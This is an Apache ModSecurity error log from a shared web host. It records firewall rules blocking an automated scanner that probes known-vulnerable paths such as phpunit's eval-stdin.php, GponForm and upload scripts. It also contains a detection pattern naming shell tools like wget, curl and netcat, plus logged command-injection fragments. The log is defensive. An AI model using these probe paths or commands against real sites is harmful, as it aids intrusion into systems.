[Tue May 26 12:51:35.086932 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:47084] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cobbler_api"] [unique_id "ahVJ_1yiSlSCHr1fdr2aSQAAALI"]
[Tue May 26 12:51:35.212297 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:47102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aTAAAANU"]
[Tue May 26 12:51:35.418198 2026] [security2:error] [pid 461618:tid 461831] [client 23.94.40.119:47106] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/GponForm/diag_Form"] [unique_id "ahVJ_1yiSlSCHr1fdr2aUAAAANg"]
[Tue May 26 12:51:35.484933 2026] [security2:error] [pid 461618:tid 461870] [client 23.94.40.119:47116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aVAAAAP8"]
[Tue May 26 12:51:35.685306 2026] [security2:error] [pid 461618:tid 461835] [client 23.94.40.119:47120] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/GponForm/diag_Form"] [unique_id "ahVJ_1yiSlSCHr1fdr2aWgAAANw"]
[Tue May 26 12:51:35.764390 2026] [security2:error] [pid 461618:tid 461860] [client 23.94.40.119:47128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aXwAAAPU"]
[Tue May 26 12:51:35.952497 2026] [security2:error] [pid 461618:tid 461849] [client 23.94.40.119:47136] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/nagiosql/admin/logbook.php"] [unique_id "ahVJ_1yiSlSCHr1fdr2aYwAAAOo"]
[Tue May 26 12:51:36.020049 2026] [security2:error] [pid 461618:tid 461853] [client 23.94.40.119:47140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2aZAAAAO4"]
[Tue May 26 12:51:36.291291 2026] [security2:error] [pid 461618:tid 461816] [client 23.94.40.119:47146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/nagiosql/admin/menuaccess.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abQAAAMk"]
[Tue May 26 12:51:36.308531 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:47160] ModSecurity: Warning. Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "1439"] [id "9009999"] [msg "8 char spam"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/system/sharedir.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abwAAAMo"]
[Tue May 26 12:51:36.403699 2026] [security2:error] [pid 461618:tid 461774] [client 23.94.40.119:47170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2adgAAAJ8"]
[Tue May 26 12:51:36.488521 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:47160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/system/sharedir.php"] [unique_id "ahVKAFyiSlSCHr1fdr2abwAAAMo"]
[Tue May 26 12:51:36.549914 2026] [security2:error] [pid 461618:tid 461824] [client 23.94.40.119:47174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/modules/attributewizardpro/file_upload.php"] [unique_id "ahVKAFyiSlSCHr1fdr2adwAAANE"]
[Tue May 26 12:51:36.678012 2026] [security2:error] [pid 461618:tid 461804] [client 23.94.40.119:47178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2afgAAAL0"]
[Tue May 26 12:51:36.762500 2026] [security2:error] [pid 461618:tid 461769] [client 23.94.40.119:47190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/en/php/usb_sync.php"] [unique_id "ahVKAFyiSlSCHr1fdr2afwAAAJo"]
[Tue May 26 12:51:36.936804 2026] [security2:error] [pid 461618:tid 461800] [client 23.94.40.119:47192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAFyiSlSCHr1fdr2ahQAAALk"]
[Tue May 26 12:51:37.218732 2026] [security2:error] [pid 461618:tid 461821] [client 23.94.40.119:47206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2akgAAAM4"]
[Tue May 26 12:51:37.521363 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:47212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/ajax.php"] [unique_id "ahVKAVyiSlSCHr1fdr2algAAALc"]
[Tue May 26 12:51:37.526080 2026] [security2:error] [pid 461618:tid 461863] [client 23.94.40.119:47228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/phpunit/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2alwAAAPg"]
[Tue May 26 12:51:37.609692 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:47238] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload/index.php"] [unique_id "ahVKAVyiSlSCHr1fdr2anAAAAOE"]
[Tue May 26 12:51:37.794981 2026] [security2:error] [pid 461618:tid 461859] [client 23.94.40.119:51866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAVyiSlSCHr1fdr2aqAAAAPQ"]
[Tue May 26 12:51:38.040137 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:51886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/change_config.php"] [unique_id "ahVKAlyiSlSCHr1fdr2aqgAAAMc"]
[Tue May 26 12:51:38.092732 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:51900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2argAAAI0"]
[Tue May 26 12:51:38.210782 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:51908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo-gallery/api/photo/search/"] [unique_id "ahVKAlyiSlSCHr1fdr2aswAAAI8"]
[Tue May 26 12:51:38.249828 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:51922] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "text/x-gwt-rpc"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/avi/avigui/avigwt"] [unique_id "ahVKAlyiSlSCHr1fdr2auQAAAJI"]
[Tue May 26 12:51:38.321183 2026] [security2:error] [pid 461618:tid 461750] [client 23.94.40.119:51924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/change_config.php"] [unique_id "ahVKAlyiSlSCHr1fdr2avQAAAIc"]
[Tue May 26 12:51:38.354457 2026] [security2:error] [pid 461618:tid 461869] [client 23.94.40.119:51934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2avgAAAP4"]
[Tue May 26 12:51:38.583528 2026] [security2:error] [pid 461618:tid 461855] [client 23.94.40.119:51950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/setup.php"] [unique_id "ahVKAlyiSlSCHr1fdr2ayAAAAPA"]
[Tue May 26 12:51:38.618791 2026] [security2:error] [pid 461618:tid 461815] [client 23.94.40.119:51964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2azQAAAMg"]
[Tue May 26 12:51:38.653891 2026] [security2:error] [pid 461618:tid 461792] [client 23.94.40.119:51974] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/external/7.0/system.System.get_infos"] [unique_id "ahVKAlyiSlSCHr1fdr2a0QAAALE"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:38.744277 2026] [cgid:error] [pid 461618:tid 461849] [client 23.94.40.119:51984] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/DownloadCfg: script not found or unable to stat
[Tue May 26 12:51:38.891010 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:51992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKAlyiSlSCHr1fdr2a2wAAAM0"]
[Tue May 26 12:51:39.019773 2026] [security2:error] [pid 461618:tid 461782] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKAlyiSlSCHr1fdr2axwAAAKc"]
[Tue May 26 12:51:39.147587 2026] [security2:error] [pid 461618:tid 461822] [client 23.94.40.119:52016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVKA1yiSlSCHr1fdr2a5AAAAM8"]
[Tue May 26 12:51:39.558914 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:52018] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/httpd/modsecurity.d/01_asl_content.conf"] [line "64"] [id "391213"] [msg "Atomicorp.com WAF Rules: Request content type is not allowed by policy"] [data "image/jp2"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/meta"] [unique_id "ahVKA1yiSlSCHr1fdr2a7gAAAJI"]
[Tue May 26 12:51:41.471221 2026] [security2:error] [pid 461618:tid 461835] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKBVyiSlSCHr1fdr2bHQAAANw"]
[Tue May 26 12:51:41.737338 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:52022] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/filemanager/upload.php"] [unique_id "ahVKBVyiSlSCHr1fdr2bMQAAAOA"]
[Tue May 26 12:51:42.787656 2026] [security2:error] [pid 461618:tid 461860] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bTgAAAPU"], referer: https://www.anujtradingco.com/
[Tue May 26 12:51:42.792672 2026] [security2:error] [pid 461618:tid 461792] [client 157.20.138.61:54508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bRQAAALE"]
[Tue May 26 12:51:42.792872 2026] [security2:error] [pid 461618:tid 461792] [client 157.20.138.61:54508] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKBlyiSlSCHr1fdr2bRQAAALE"]
[Tue May 26 12:51:43.166310 2026] [security2:error] [pid 461618:tid 461787] [client 23.94.40.119:52058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bXQAAAKw"]
[Tue May 26 12:51:43.626990 2026] [security2:error] [pid 461618:tid 461831] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bcAAAANg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285318&moderation-hash=ebe2c4156d943d51100e8ea3501d2963
[Tue May 26 12:51:43.877675 2026] [security2:error] [pid 461618:tid 461757] [client 23.94.40.119:52080] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload"] [unique_id "ahVKB1yiSlSCHr1fdr2bdwAAAI4"]
[Tue May 26 12:51:44.100602 2026] [security2:error] [pid 461618:tid 461830] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKB1yiSlSCHr1fdr2bdgAAANc"]
[Tue May 26 12:51:44.482880 2026] [security2:error] [pid 461618:tid 461807] [client 23.94.40.119:52094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:cd|perl|killall|traceroute|python|r(?:pm|sync)|yum|apt-get|emerge|lynx|links|mkdir|elinks|cmd|pwd|wget|lwp-(?:download|request|mirror|rget)|id|uname|cvs|svn|(?:s|r)(?:cp|sh)|n(?:et(?:stat|cat)|asm)|rexec|smbclient|t?ftp|ncftp|curl|telnet|g(?:c ..." at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "582"] [id "340023"] [rev "6"] [msg "Atomicorp.com WAF Rules: Attack Blocked - remote command execution"] [data "cat /"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/fuel/pages/select/"] [unique_id "ahVKCFyiSlSCHr1fdr2bkwAAAMA"]
[Tue May 26 12:51:44.642164 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:52102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/web/google_analytics.php"] [unique_id "ahVKCFyiSlSCHr1fdr2bmAAAAPs"]
[Tue May 26 12:51:45.030133 2026] [security2:error] [pid 461618:tid 461754] [client 23.94.40.119:52104] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/qsr_server/device/getThumbnail"] [unique_id "ahVKCVyiSlSCHr1fdr2bogAAAIs"]
[Tue May 26 12:51:45.047030 2026] [security2:error] [pid 461618:tid 461842] [client 23.94.40.119:52108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/installer-backup.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bowAAAOM"]
[Tue May 26 12:51:45.063132 2026] [security2:error] [pid 461618:tid 461874] [client 74.249.173.207:6095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bpAAAAQM"]
[Tue May 26 12:51:45.124326 2026] [security2:error] [pid 461618:tid 461867] [client 23.94.40.119:52110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bqAAAAPw"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:45.835454 2026] [security2:error] [pid 461618:tid 461837] [client 23.94.40.119:52178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/type.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bzAAAAN4"]
[Tue May 26 12:51:46.108715 2026] [security2:error] [pid 461618:tid 461855] [client 23.94.40.119:52220] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/public/login.htm"] [unique_id "ahVKClyiSlSCHr1fdr2b1gAAAPA"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:51:46.121261 2026] [security2:error] [pid 461618:tid 461793] [client 113.211.215.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKCVyiSlSCHr1fdr2bwgAAALI"]
[Tue May 26 12:51:46.199467 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:52230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/data/cache_template/rss.tpl.php"] [unique_id "ahVKClyiSlSCHr1fdr2b2wAAALo"]
[Tue May 26 12:51:46.302808 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:52246] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/wp-payeezy-pay/donate.php"] [unique_id "ahVKClyiSlSCHr1fdr2b3QAAAKE"]
